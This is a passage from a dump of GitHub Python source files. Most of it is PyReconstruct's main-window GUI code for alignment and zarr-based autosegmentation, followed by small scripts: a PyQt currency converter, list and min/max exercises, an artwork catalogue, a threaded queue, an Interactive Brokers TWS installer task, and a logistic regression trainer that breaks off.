series.\"\"\"\n HistoryTableWidget(self.series.getFullHistory(), self)\n \n def openObjectList(self):\n \"\"\"Open the object list widget.\"\"\"\n self.saveAllData()\n self.field.openObjectList()\n \n def openZtraceList(self):\n \"\"\"Open the ztrace list widget.\"\"\"\n self.saveAllData()\n self.field.openZtraceList()\n \n def openFlagList(self):\n \"\"\"Open the flag widget.\"\"\"\n self.saveAllData()\n self.field.openFlagList()\n \n def toggleZtraces(self):\n \"\"\"Toggle whether ztraces are shown.\"\"\"\n self.field.deselectAllTraces()\n self.series.options[\"show_ztraces\"] = not self.series.options[\"show_ztraces\"]\n self.field.generateView(generate_image=False)\n \n def openTraceList(self):\n \"\"\"Open the trace list widget.\"\"\"\n self.field.openTraceList()\n \n def openSectionList(self):\n \"\"\"Open the section list widget.\"\"\"\n self.saveAllData()\n self.field.openSectionList()\n \n def setToObject(self, obj_name : str, section_num : int):\n \"\"\"Focus the field on an object from a specified section.\n \n Params:\n obj_name (str): the name of the object\n section_num (int): the section the object is located\n \"\"\"\n if obj_name is not None and section_num is not None:\n self.changeSection(section_num)\n self.field.findContour(obj_name)\n \n def setToFlag(self, snum : int, flag : Flag):\n \"\"\"Focus the field on a flag.\n \n Params:\n snum (int): the section number\n flag (Flag): the flag\n \"\"\"\n if snum is not None and flag is not None:\n self.changeSection(snum)\n self.field.findFlag(flag)\n \n def findObjectFirst(self, obj_name=None):\n \"\"\"Find the first or last contour in the series.\n \n Params:\n obj_name (str): the name of the object to find\n \"\"\"\n if obj_name is None:\n obj_name, confirmed = QInputDialog.getText(\n self,\n \"Find Object\",\n \"Enter the object name:\",\n )\n if not confirmed:\n return\n\n # find the contour\n self.setToObject(obj_name, self.series.data.getStart(obj_name))\n \n def changeTform(self, new_tform_list : list = None):\n \"\"\"Open a dialog to change the transform of a section.\"\"\"\n # check for section locked status\n if self.field.section.align_locked:\n return\n \n if new_tform_list is None:\n current_tform = \" \".join(\n [str(round(n, 5)) for n in self.field.section.tform.getList()]\n )\n new_tform_list, confirmed = QInputDialog.getText(\n self, \"New Transform\", \"Enter the desired section transform:\", text=current_tform)\n if not confirmed:\n return\n try:\n new_tform_list = [float(n) for n in new_tform_list.split()]\n if len(new_tform_list) != 6:\n return\n except ValueError:\n return\n self.field.changeTform(Transform(new_tform_list))\n \n def translate(self, direction : str, amount : str):\n \"\"\"Translate the current transform.\n \n Params:\n direction (str): left, right, up, or down\n amount (str): small, med, or big\n \"\"\"\n if amount == \"small\":\n num = self.series.options[\"small_dist\"]\n elif amount == \"med\":\n num = self.series.options[\"med_dist\"]\n elif amount == \"big\":\n num = self.series.options[\"big_dist\"]\n if direction == \"left\":\n x, y = -num, 0\n elif direction == \"right\":\n x, y = num, 0\n elif direction == \"up\":\n x, y = 0, num\n elif direction == \"down\":\n x, y = 0, -num\n self.field.translate(x, y)\n \n def newAlignment(self, new_alignment_name : str):\n \"\"\"Add a new alignment (based on existing alignment).\n \n Params:\n new_alignment_name (str): the name of the new alignment\n \"\"\"\n if new_alignment_name in self.field.section.tforms:\n QMessageBox.information(\n self,\n \" \",\n \"This alignment already exists.\",\n QMessageBox.Ok\n )\n return\n self.series.newAlignment(\n new_alignment_name,\n self.series.alignment\n )\n \n def changeAlignment(self):\n \"\"\"Open dialog to modify and change alignments.\n \n Params:\n alignment_name (str): the name of the alignment ro switch to\n \"\"\"\n self.saveAllData()\n \n alignments = list(self.field.section.tforms.keys())\n\n response, confirmed = AlignmentDialog(\n self,\n alignments,\n self.series.alignment\n ).exec()\n if not confirmed:\n return\n \n alignment_name, alignment_dict = response\n\n modified = False\n if alignment_dict:\n for k, v in alignment_dict.items():\n if k != v:\n modified = True\n break\n if modified:\n self.series.modifyAlignments(alignment_dict)\n self.field.reload()\n \n if alignment_name:\n self.field.changeAlignment(alignment_name)\n elif modified:\n self.field.changeAlignment(self.series.alignment)\n \n def calibrateMag(self, trace_lengths : dict = None):\n \"\"\"Calibrate the pixel size for the series.\n \n Params:\n trace_lengths (dict): the lengths of traces to calibrate\n \"\"\"\n self.saveAllData()\n \n if trace_lengths is None:\n # gather trace names\n names = []\n for trace in self.field.section.selected_traces:\n if trace.name not in names:\n names.append(trace.name)\n \n if len(names) == 0:\n notify(\"Please select traces for calibration.\")\n \n # prompt user for length of each trace name\n trace_lengths = {}\n for name in names:\n d, confirmed = QInputDialog.getText(\n self,\n \"Trace Length\",\n f'Length of \"{name}\" in microns:'\n )\n if not confirmed:\n return\n try:\n d = float(d)\n except ValueError:\n return\n trace_lengths[name] = d\n \n self.field.calibrateMag(trace_lengths)\n \n def modifyPointer(self, event=None):\n \"\"\"Modify the pointer properties.\"\"\"\n s, t = self.series.options[\"pointer\"]\n structure = [\n [\"Shape:\"],\n [(\"radio\", (\"Rectangle\", s==\"rect\"), (\"Lasso\", s==\"lasso\"))],\n [\"Type:\"],\n [(\"radio\", (\"Include intersected traces\", t==\"inc\"), (\"Exclude intersected traces\", t==\"exc\"))]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Pointer Settings\")\n if not confirmed:\n return\n \n s = \"rect\" if response[0][0][1] else \"lasso\"\n t = \"inc\" if response[1][0][1] else \"exc\"\n self.series.options[\"pointer\"] = s, t\n self.seriesModified()\n \n def modifyGrid(self, event=None):\n \"\"\"Modify the grid properties.\"\"\"\n response, confirmed = GridDialog(\n self,\n tuple(self.series.options[\"grid\"])\n ).exec()\n if not confirmed:\n return\n \n self.series.options[\"grid\"] = response\n self.seriesModified()\n \n def modifyKnife(self, event=None):\n \"\"\"Modify the knife properties.\"\"\"\n structure = [\n [\"When using the knife, objects smaller than this percent\"],\n [\"of the original trace area will be automatically deleted.\"],\n [\"Knife delete threshold (%):\", (\"float\", self.series.options[\"knife_del_threshold\"], (0, 100))]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Knife\")\n if not confirmed:\n return\n \n self.series.options[\"knife_del_threshold\"] = response[0]\n self.seriesModified()\n \n def resetTracePalette(self):\n \"\"\"Reset the trace palette to default traces.\"\"\"\n self.mouse_palette.resetPalette()\n self.saveAllData()\n self.seriesModified()\n \n def setZarrLayer(self, zarr_dir=None):\n \"\"\"Set a zarr layer.\"\"\"\n if not zarr_dir:\n zarr_dir = FileDialog.get(\n \"dir\",\n self,\n \"Select overlay zarr\",\n )\n if not zarr_dir: return\n\n self.series.zarr_overlay_fp = zarr_dir\n self.series.zarr_overlay_group = None\n\n groups = []\n for g in os.listdir(zarr_dir):\n if os.path.isdir(os.path.join(zarr_dir, g)):\n groups.append(g)\n\n self.zarr_palette = ZarrPalette(groups, self)\n \n def setLayerGroup(self, group_name):\n \"\"\"Set the specific group displayed in the zarr layer.\"\"\"\n if not group_name:\n group_name = None\n if self.zarr_palette.cb.currentText != group_name:\n self.zarr_palette.cb.setCurrentText(group_name)\n self.series.zarr_overlay_group = group_name\n self.field.createZarrLayer()\n self.field.generateView()\n \n def removeZarrLayer(self):\n \"\"\"Remove an existing zarr layer.\"\"\"\n self.series.zarr_overlay_fp = None\n self.series.zarr_overlay_group = None\n if self.zarr_palette:\n self.zarr_palette.close()\n self.field.createZarrLayer()\n self.field.generateView()\n\n def exportToZarr(self):\n \"\"\"Set up an autosegmentation for a series.\n \n Params:\n run (str): \"train\" or \"segment\"\n \"\"\"\n self.saveAllData()\n self.removeZarrLayer()\n\n inputs, dialog_confirmed = CreateZarrDialog(self, self.series).exec()\n\n if not dialog_confirmed: return\n\n print(\"Making zarr directory...\")\n \n # export to zarr\n border_obj, srange, mag = inputs\n data_fp = seriesToZarr(\n self.series,\n border_obj,\n srange,\n mag\n )\n\n self.series.options[\"autoseg\"][\"zarr_current\"] = data_fp\n\n print(\"Zarr directory done.\")\n \n def train(self, retrain=False):\n \"\"\"Train an autosegmentation model.\"\"\"\n self.saveAllData()\n self.removeZarrLayer()\n\n model_paths = {\"a\":{\"b\":\"a/b/m.py\"}}\n\n opts = self.series.options[\"autoseg\"]\n\n response, confirmed = TrainDialog(self, self.series, model_paths, opts, retrain).exec()\n if not confirmed: return\n \n (data_fp, iterations, save_every, group, model_path, cdir, \\\n pre_cache, min_masked, downsample) = response\n\n training_opts = {\n 'zarr_current': data_fp,\n 'iters': iterations,\n 'save_every': save_every,\n 'group': group,\n 'model_path': model_path,\n 'checkpts_dir': cdir,\n 'pre_cache': pre_cache,\n 'min_masked': min_masked,\n 'downsample_bool': downsample\n }\n\n for k, v in training_opts.items():\n opts[k] = v\n self.seriesModified(True)\n\n print(\"Exporting labels to zarr directory...\")\n \n if retrain:\n group_name = f\"labels_{self.series.getRecentSegGroup()}_keep\"\n seriesToLabels(self.series, data_fp)\n \n else:\n group_name = f\"labels_{group}\"\n seriesToLabels(self.series, data_fp, group)\n\n print(\"Zarr directory updated with labels!\")\n\n if retrain: self.field.reload()\n if retrain and self.field.obj_table_manager:\n self.field.obj_table_manager.refresh()\n\n print(\"Starting training....\")\n\n print(\"Importing training modules...\")\n\n from autoseg import train, make_mask, model_paths\n\n make_mask(data_fp, group_name)\n \n sources = [{\n \"raw\" : (data_fp, \"raw\"),\n \"labels\" : (data_fp, group_name),\n \"unlabelled\" : (data_fp, \"unlabelled\")\n }]\n\n train(\n iterations=iterations,\n save_every=save_every,\n sources=sources,\n model_path=model_path,\n pre_cache=pre_cache,\n min_masked=min_masked,\n downsample=downsample,\n checkpoint_basename=os.path.join(cdir, \"model\") # where existing checkpoints\n )\n\n print(\"Done training!\")\n \n def markKeep(self):\n \"\"\"Add the selected trace to the most recent \"keep\" segmentation group.\"\"\"\n keep_tag = f\"{self.series.getRecentSegGroup()}_keep\"\n for trace in self.field.section.selected_traces:\n trace.addTag(keep_tag)\n # deselect traces and hide\n self.field.hideTraces()\n self.field.deselectAllTraces()\n\n def predict(self, data_fp : str = None):\n \"\"\"Run predictons.\n \n Params:\n data_fp (str): the filepath for the zarr\n \"\"\"\n self.saveAllData()\n self.removeZarrLayer()\n\n print(\"Importing models...\")\n \n from autoseg import predict, model_paths\n # model_paths = {\"a\":{\"b\":\"a/b/m.py\"}}\n\n opts = self.series.options[\"autoseg\"]\n\n response, dialog_confirmed = PredictDialog(self, model_paths, opts).exec()\n\n if not dialog_confirmed: return\n\n data_fp, model_path, cp_path, write_opts, increase, downsample, full_out_roi = response\n\n predict_opts = {\n 'zarr_current': data_fp,\n 'model_path': model_path,\n 'checkpts_dir': os.path.dirname(cp_path),\n 'write': write_opts,\n 'increase': increase,\n 'downsample_bool': downsample,\n 'full_out_roi': full_out_roi\n }\n\n for k, v in predict_opts.items():\n opts[k] = v\n self.seriesModified(True)\n \n print(\"Running predictions...\")\n\n zarr_datasets = predict(\n sources=[(data_fp, \"raw\")],\n out_file=data_fp,\n checkpoint_path=cp_path,\n model_path=model_path,\n write=write_opts,\n increase=increase,\n downsample=downsample,\n full_out_roi=full_out_roi\n )\n\n # display the affinities\n self.setZarrLayer(data_fp)\n for zg in os.listdir(data_fp):\n if zg.startswith(\"pred_affs\"):\n self.setLayerGroup(zg)\n break\n\n print(\"Predictions done.\")\n \n def segment(self, data_fp : str = None):\n \"\"\"Run an autosegmentation.\n \n Params:\n data_fp (str): the filepath for the zarr\n \"\"\"\n self.saveAllData()\n self.removeZarrLayer()\n\n print(\"Importing modules...\")\n \n from autoseg import hierarchical\n\n opts = self.series.options[\"autoseg\"]\n\n response, dialog_confirmed = SegmentDialog(self, opts).exec()\n\n if not dialog_confirmed: return\n\n data_fp, thresholds, downsample, norm_preds, min_seed, merge_fun = response\n\n segment_opts = {\n \"zarr_current\": data_fp,\n \"thresholds\": thresholds,\n \"downsample_int\": downsample,\n \"norm_preds\": norm_preds,\n \"min_seed\": min_seed,\n \"merge_fun\": merge_fun\n }\n\n for k, v in segment_opts.items():\n opts[k] = v\n self.seriesModified(True)\n\n print(\"Running hierarchical...\")\n\n dataset = None\n for d in os.listdir(data_fp):\n if \"affs\" in d:\n dataset = d\n break\n\n print(\"Segmentation started...\")\n \n hierarchical.run(\n data_fp,\n dataset,\n thresholds=list(sorted(thresholds)),\n normalize_preds=norm_preds,\n min_seed_distance=min_seed,\n merge_function=merge_fun\n )\n\n print(\"Segmentation done.\")\n\n # display the segmetnation\n self.setZarrLayer(data_fp)\n for zg in os.listdir(data_fp):\n if zg.startswith(\"seg\"):\n self.setLayerGroup(zg)\n break\n \n def importLabels(self, all=False):\n \"\"\"Import labels from a zarr.\"\"\"\n if not self.field.zarr_layer or not self.field.zarr_layer.is_labels:\n return\n \n # get necessary data\n data_fp = self.series.zarr_overlay_fp\n group_name = self.series.zarr_overlay_group\n\n labels = None if all else self.field.zarr_layer.selected_ids\n \n labelsToObjects(\n self.series,\n data_fp,\n group_name,\n labels\n )\n self.field.reload()\n self.removeZarrLayer()\n\n if self.field.obj_table_manager:\n self.field.obj_table_manager.refresh()\n\n notify(\"Labels imported successfully.\")\n \n def mergeLabels(self):\n \"\"\"Merge selected labels in a zarr.\"\"\"\n if not self.field.zarr_layer:\n return\n \n self.field.zarr_layer.mergeLabels()\n self.field.generateView()\n \n # def mergeObjects(self, new_name=None):\n # \"\"\"Merge full objects across the series.\n \n # Params:\n # new_name (str): the new name for the merged objects\n # \"\"\" \n # names = set()\n # for trace in self.field.section.selected_traces:\n # names.add(trace.name)\n # names = list(names)\n \n # if not new_name:\n # new_name, confirmed = QInputDialog.getText(\n # self,\n # \"Object Name\",\n # \"Enter the desired name for the merged object:\",\n # text=names[0]\n # )\n # if not confirmed or not new_name:\n # return\n \n # self.series.mergeObjects(names, new_name)\n # self.field.reload()\n \n def edit3DSmoothing(self, smoothing_alg : str = \"\"):\n \"\"\"Modify the algorithm used for 3D smoothing.\n \n Params:\n smoothing_alg (str): the name of the smoothing algorithm to use\n \"\"\"\n if not smoothing_alg:\n structure = [\n [(\"radio\",\n (\"Laplacian (most smooth)\", self.series.options[\"3D_smoothing\"] == \"laplacian\"),\n (\"Humphrey (less smooth)\", self.series.options[\"3D_smoothing\"] == \"humphrey\"),\n (\"None (blocky)\", self.series.options[\"3D_smoothing\"] == \"none\"))]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"3D Smoothing\")\n if not confirmed:\n return\n \n if response[0][0][1]:\n smoothing_alg = \"laplacian\"\n elif response[0][1][1]:\n smoothing_alg = \"humphrey\"\n elif response[0][2][1]:\n smoothing_alg = \"none\"\n \n if smoothing_alg not in [\"laplacian\", \"humphrey\", \"none\"]:\n return\n\n self.series.options[\"3D_smoothing\"] = smoothing_alg\n self.saveAllData()\n self.seriesModified()\n \n def hideSeriesTraces(self, hidden=True):\n \"\"\"Hide or unhide all traces in the entire series.\n \n Params:\n hidden (bool) True if traces will be hidden\n \"\"\"\n self.saveAllData()\n self.series.hideAllTraces(hidden)\n self.field.reload()\n \n def setFindZoom(self):\n \"\"\"Set the magnification for find contour.\"\"\"\n z, confirmed = QInputDialog.getInt(\n self,\n \"Find Contour Zoom\",\n \"Enter the find contour zoom (0-100):\",\n value=self.series.options[\"find_zoom\"],\n minValue=0,\n maxValue=100\n )\n if not confirmed:\n return\n\n self.series.options[\"find_zoom\"] = z\n \n def deleteDuplicateTraces(self):\n \"\"\"Remove all duplicate traces from the series.\"\"\"\n self.saveAllData()\n if not noUndoWarning():\n return\n \n removed = self.series.deleteDuplicateTraces()\n\n if removed:\n message = \"The following duplicate traces were removed:\"\n for snum in removed:\n message += f\"\\nSection {snum}: \" + \", \".join(removed[snum])\n TextWidget(self, message, title=\"Removed Traces\")\n else:\n notify(\"No duplicate traces found.\")\n\n self.field.reload()\n self.seriesModified(True)\n\n def addTo3D(self, obj_names, ztraces=False):\n \"\"\"Generate the 3D view for a list of objects.\n \n Params:\n obj_names (list): a list of object names\n \"\"\"\n self.saveAllData()\n \n if not self.viewer or self.viewer.is_closed:\n self.viewer = CustomPlotter(self, obj_names, ztraces)\n else: \n if ztraces:\n self.viewer.addZtraces(obj_names)\n else:\n self.viewer.addObjects(obj_names)\n \n def removeFrom3D(self, obj_names, ztraces=False):\n \"\"\"Remove objects from 3D viewer.\n \n Params:\n obj_names (list): a list of object names\n \"\"\"\n self.saveAllData()\n if not self.viewer or self.viewer.is_closed:\n return\n \n if ztraces:\n self.viewer.removeZtraces(obj_names)\n else:\n self.viewer.removeObjects(obj_names)\n \n def toggleCuration(self):\n \"\"\"Quick shortcut to toggle curation on/off for the tables.\"\"\"\n if self.field.obj_table_manager:\n self.field.obj_table_manager.toggleCuration()\n \n def backspace(self):\n \"\"\"Called when backspace is pressed.\"\"\"\n w = self.focusWidget()\n if isinstance(w, CopyTableWidget):\n w.backspace()\n else:\n self.field.backspace()\n \n def copy(self):\n \"\"\"Called when Ctrl+C is pressed.\"\"\"\n w = self.focusWidget()\n if isinstance(w, CopyTableWidget):\n w.copy()\n else:\n self.field.copy()\n \n def pasteAttributesToPalette(self, use_shape=False):\n \"\"\"Paste the attributes from the first clipboard trace to the selected palette button.\"\"\"\n if not self.field.clipboard and not self.field.section.selected_traces:\n return\n elif not self.field.clipboard:\n trace = self.field.section.selected_traces[0]\n else:\n trace = self.field.clipboard[0]\n self.mouse_palette.pasteAttributesToButton(trace, use_shape)\n \n def displayShortcuts(self):\n \"\"\"Display the shortcuts.\"\"\"\n if not self.shortcuts_widget or self.shortcuts_widget.closed:\n self.shortcuts_widget = HelpWidget(\"shortcuts\")\n\n def restart(self):\n self.restart_mainwindow = True\n\n # Clear console\n \n if os.name == 'nt': # Windows\n _ = os.system('cls')\n \n else: # Mac and Linux\n _ = os.system('clear')\n \n self.close()\n \n def closeEvent(self, event):\n \"\"\"Save all data to files when the user exits.\"\"\"\n if self.series.options[\"autosave\"]:\n self.saveToJser(close=True)\n else:\n response = self.saveToJser(notify=True, close=True)\n if response == \"cancel\":\n event.ignore()\n return\n if self.viewer and not self.viewer.is_closed:\n self.viewer.close()\n event.accept()\n","repo_name":"SynapseWeb/PyReconstruct","sub_path":"PyReconstruct/modules/gui/main/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":89448,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"34373867226","text":"from PyQt5.QtCore import QObject\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import (\n QWidget,\n QApplication,\n QMainWindow,\n QLabel,\n QPushButton,\n QDoubleSpinBox,\n QVBoxLayout\n)\n\n\nclass Course(QObject):\n def get(self):\n return 58.86\n\n\nclass Converter(QMainWindow):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.initUi()\n self.init_signals()\n self.initLayout()\n\n def init_signals(self):\n self.convertBtn.clicked.connect(self.on_click)\n self.clearBtn.clicked.connect(self.on_clear)\n self.srcAmount.valueChanged.connect(self.change_value)\n self.resultAmount.valueChanged.connect(self.change_value)\n\n def initUi(self):\n self.setWindowTitle('Конвертер валют RUB/USD 1.0')\n self.srcLabel = QLabel('Введите сумму в рублях (RUB)', self)\n self.resultLabel = QLabel('Или введите сумму в долларах (USD)', self)\n self.srcAmount = QDoubleSpinBox(self)\n self.srcAmount.setMaximum(999999999999)\n self.resultAmount = QDoubleSpinBox(self)\n self.resultAmount.setMaximum(999999999999)\n\n self.convertBtn = QPushButton('Перевести', self)\n self.clearBtn = QPushButton('Сброс', self)\n self.convertBtn.setEnabled(False)\n\n def on_click(self):\n value = max(self.srcAmount.value(), self.resultAmount.value())\n if self.srcAmount.value() != 0:\n self.resultAmount.setValue(value/Course().get())\n else:\n self.srcAmount.setValue(value/Course().get())\n\n def on_clear(self):\n self.resultAmount.setValue(0)\n self.srcAmount.setValue(0)\n\n def change_value(self):\n if self.srcAmount.value() == 0 and self.resultAmount.value() != 0:\n self.convertBtn.setEnabled(True)\n elif self.srcAmount.value() > 0 and self.resultAmount.value() == 0:\n self.convertBtn.setEnabled(True)\n else:\n self.convertBtn.setEnabled(False)\n\n def initLayout(self):\n self.w = QWidget()\n\n self.mainLayout = QVBoxLayout(self.w)\n self.mainLayout.addWidget(self.srcLabel)\n self.mainLayout.addWidget(self.srcAmount)\n self.mainLayout.addWidget(self.resultLabel)\n self.mainLayout.addWidget(self.resultAmount)\n self.mainLayout.addWidget(self.convertBtn)\n self.mainLayout.addWidget(self.clearBtn)\n self.setCentralWidget(self.w)\n\n def press_event(self, key):\n if key.key() == Qt.Key_Enter: self.on_click()\n\nimport sys\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n converter = Converter()\n converter.setWindowOpacity(0.95) # Задали небольшую прозрачность главного экрана\n pal = converter.palette()\n pal.setColor(QtGui.QPalette.Normal, QtGui.QPalette.Window,\n QtGui.QColor(\"#98FF98\")) # задали background-color (Зеленая мята)\n converter.setPalette(pal)\n converter.resize(350, 150)\n converter.show()\n\n\n sys.exit(app.exec_())","repo_name":"geopard26/PyQt1","sub_path":"convert_valut.py","file_name":"convert_valut.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39608359911","text":"def delete_nulls(list):\n\n count = 0\n\n for i in range(0, len(list)):\n if list[i] != 0:\n list[count] = list[i]\n count += 1\n num_zeroes = (len(list)) - count\n\n for i in range(num_zeroes):\n list.pop()\n\n print(list)\n\n\nlistik = [0, 1, 2, 3, 0, 4, 0, 0, 19, 0, 8]\ndelete_nulls(listik)\n\n","repo_name":"pekkipo/Computer_Vision","sub_path":"untitled/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72288824747","text":"import sys\n\n\ndef main():\n input_filename = \"minmax.in\" if len(sys.argv) == 1 else sys.argv[1]\n output_filename = \"minmax.out\" if len(sys.argv) == 1 else sys.argv[2]\n\n array = read_input(input_filename)\n minimum, maximum = solve(array)\n write_output(output_filename, minimum, maximum)\n\n\ndef read_input(filename):\n with open(filename, \"r\") as input_file:\n array_str = input_file.readline()\n array = [int(item) for item in array_str.split()]\n return array\n\n\ndef solve(array):\n minimum = min(array)\n maximum = max(array)\n return minimum, maximum\n\n\ndef write_output(filename, minimum, maximum):\n with open(filename, \"w\") as output_file:\n output_file.write(\"{minimum} {maximum}\".format(**locals()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YuriyGuts/lits-algorithms-course","sub_path":"handouts/problems/code/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"33088827397","text":"#Modelo: [[nome, desc, anoCriação, periodo, compositor, duração, id],...]\r\n\r\nimport csv\r\nfrom fileinput import filename\r\nimport matplotlib.pyplot as plt\r\n\r\ndef lerObras(filename):\r\n file=open(filename, encoding=\"UTF8\")\r\n file.readline()\r\n csv_file=csv.reader(file,delimiter=\";\")\r\n\r\n lista=[]\r\n for obra in csv_file:\r\n lista.append(tuple(obra))\r\n\r\n file.close()\r\n return lista\r\n\r\ndef contarObras(lista):\r\n return len(lista)\r\n\r\ndef imprime(obras):\r\n print(f\"| {'Nome':^20} | {'Descrição':^25} | {'Ano':^8} | {'Compositor':^15} |\")\r\n for nome, desc, ano, _, comp, *_ in obras:\r\n print(f\"| {nome[:20]:20} | {desc[:25]:25} | {ano:^8} | {comp[:15]:15} |\")\r\n\r\ndef ordem(tuplo):\r\n return(tuplo[0])\r\n\r\ndef titAno(obras):\r\n lista=[]\r\n for nome, _, ano, *_ in obras:\r\n lista.append((nome,ano))\r\n\r\n lista.sort(key=ordem)\r\n return lista\r\n\r\ndef ordem2(tuplo):\r\n return(tuplo[1])\r\n\r\ndef titAno_2(obras):\r\n lista=[]\r\n for nome, _, ano, *_ in obras:\r\n lista.append((nome,ano))\r\n \r\n lista.sort(key=ordem2)\r\n return lista\r\n\r\ndef titporAno(obras):\r\n dici={}\r\n for nome, _, ano, *_ in obras:\r\n if ano in dici.keys():\r\n dici[ano].append(nome)\r\n else:\r\n dici[ano]=[nome]\r\n return dici\r\n\r\ndef titporPeriodo(obras):\r\n dici={}\r\n for nome, _, _, periodo, *_ in obras:\r\n if periodo in dici.keys():\r\n dici[periodo].append(nome)\r\n else:\r\n dici[periodo]=[nome]\r\n return dici\r\n\r\n\r\ndef titporCompositor(obras):\r\n dict={}\r\n for nome, _, _, _,compositor, *_ in obras:\r\n if compositor in dict.keys():\r\n dict[compositor].append(nome)\r\n else:\r\n dict[compositor]=[nome]\r\n return dict\r\n\r\ndef grafico(obras,criterio):\r\n distrib=criterio(obras)\r\n height=[]\r\n for list in distrib.values():\r\n height.append(len(list))\r\n plt.bar(distrib.keys(), height)\r\n plt.xticks([x for x in range(0, len(distrib.keys()))], distrib.keys(), rotation='vertical')\r\n plt.show()\r\n return\r\n\r\ndef novaDistrib(obras):\r\n res= []\r\n listaComp= []\r\n for obra in obras:\r\n nome, desc, ano, periodo, comp, duracao, id = obra\r\n if comp not in listaComp:\r\n listaComp.append(comp)\r\n for compositor in listaComp:\r\n listaObras= []\r\n for obra in obras:\r\n nome, desc, ano, periodo, comp, duracao, id = obra\r\n if comp == compositor:\r\n listaObras.append(nome)\r\n res.append((compositor, listaObras))\r\n return res\r\n\r\ndef lernovaDistrib(lista):\r\n for tuplo in lista:\r\n autor, obras = tuplo\r\n i = 1\r\n branco = \"\"\r\n print(f\"\\n{autor:<30}|{obras[0]:<20}\")\r\n while i != len(obras):\r\n print(f\"{branco:<30}|{obras[i]:<20}\")\r\n i += 1\r\n return","repo_name":"Nunolxm/ATP2022","sub_path":"TPC6/obras.py","file_name":"obras.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33892766266","text":"from collections import deque\n\nfrom concurrent.futures import Future\n# fut = Future()\n# fut.result() # blocks - wait for set_result\n# other threads\n# fut.set_result(42) # unblock\n\nfrom threading import Thread, Lock\n\nfrom time import sleep\n\nclass Queuey:\n def __init__(self, maxsize):\n self.mutex = Lock()\n self.maxsize = maxsize\n self.items = deque()\n self.getters = deque()\n self.putters = deque()\n\n def get_noblock(self):\n with self.mutex:\n if self.items:\n # Wake a putter\n if self.putters:\n self.putters.popleft().set_result(True)\n return self.items.popleft(), None\n else:\n fut = Future()\n self.getters.append(fut)\n return None, fut\n\n def put_noblock(self, item):\n with self.mutex:\n if len(self.items) < self.maxsize:\n self.items.append(item)\n # Wake a getter\n if self.getters:\n self.getters.popleft().set_result(\n self.items.popleft())\n else:\n fut = Future()\n self.putters.append(fut)\n return fut\n\n def get_sync(self):\n item, fut = self.get_noblock()\n if fut:\n item = fut.result() # wait for it\n return item\n\n def put_sync(self, item):\n while True: # try to put\n fut = self.put_noblock(item)\n if fut is None:\n return \n fut.result()\n\ndef producer(q, n):\n for i in range(n):\n q.put_sync(i)\n q.put_sync(None)\n\ndef consumer(q):\n while True:\n print(\"Trying to get\")\n item = q.get_sync()\n if item is None:\n break\n\n print(\"Got:\", item)\n\nif __name__ == \"__main__\":\n q = Queuey(2)\n Thread(target=producer, args=(q, 10)).start()\n Thread(target=consumer, args=(q,)).start()\n","repo_name":"monarin/divelite","sub_path":"python3/asyncio/thread_q.py","file_name":"thread_q.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27689351725","text":"import os\nimport posixpath\n\nfrom celery import shared_task\n\nIB_HOME = os.getenv('IB_HOME', '')\n\n# download and extract TWS jar file\ncmd_install = \"\"\"\\\nIB_HOME=%(IB_HOME)s\nmkdir $IB_HOME\ncd $IB_HOME\nwget https://download2.interactivebrokers.com/download/unixmacosx_latest.jar\njar xf unixmacosx_latest.jar\n\"\"\"\n\n# Command to install TWS from extracted jar file\ncmd_run = \"\"\"\\\nIB_HOME=%(IB_HOME)s\ncd $IB_HOME/IBJts\njava -cp jts.jar:total.2013.jar -Xmx512M -XX:MaxPermSize=128M jclient.LoginFrame .\n\"\"\"\n\n@shared_task\ndef install():\n cmd = cmd_install % {'IB_HOME': IB_HOME}\n os.system(cmd)\n\n@shared_task\ndef run():\n cmd = cmd_run % {'IB_HOME': IB_HOME}\n os.system(cmd)\n","repo_name":"zbanga/abund.com","sub_path":"pulley-0.0.2/pulley/brokers/ib/tws.py","file_name":"tws.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25574914950","text":"import os\nimport math\nfrom model import *\nfrom load_data import load_data\nfrom batch import batcher\n\nif __name__ == \"__main__\":\n dirpath = os.path.dirname(__file__)\n #parameter\n vocasize = 195887\n epoch = 100\n n_in = vocasize\n n_out = 1\n lr = 0.005\n minibatch_size = 32\n\n train_x,train_y,dev_x,dev_y,test_x,test_y = load_data(dirpath,vocasize)\n m = math.ceil(len(train_y)/minibatch_size)\n #train\n model = LogisticRegression(n_in,n_out,lr,minibatch_size)\n print('Start Training..')\n for ep in range(epoch):\n loss = 0\n accuracy = 0\n for input_x,label_y in batcher(train_x,train_y,minibatch_size):\n y = model.forward(input_x)\n loss += model.cross_entropy_function(y,label_y)\n accuracy += model.accuracy(y,label_y)\n delta_w,delta_b = model.backward(input_x,y,label_y)\n model.update(delta_w,delta_b)\n print(\"Train | Epoch:{0} | Data Size:{1} | Loss:{2:.3f} | Accuracy:{3:.2f}\".format(ep+1,len(train_x),loss/m,accuracy/m))\n if ep%10==0:\n y = model.forward(dev_x)\n loss = model.cross_entropy_function(y,dev_y)\n accuracy = model.accuracy(y,dev_y)\n print(\"Dev | Epoch:{0} | Data Size:{1} | Loss:{2:.3f} | Accuracy:{3:.2f}\".format(ep+1,len(dev_y),loss,accuracy))\n\n #test\n y = 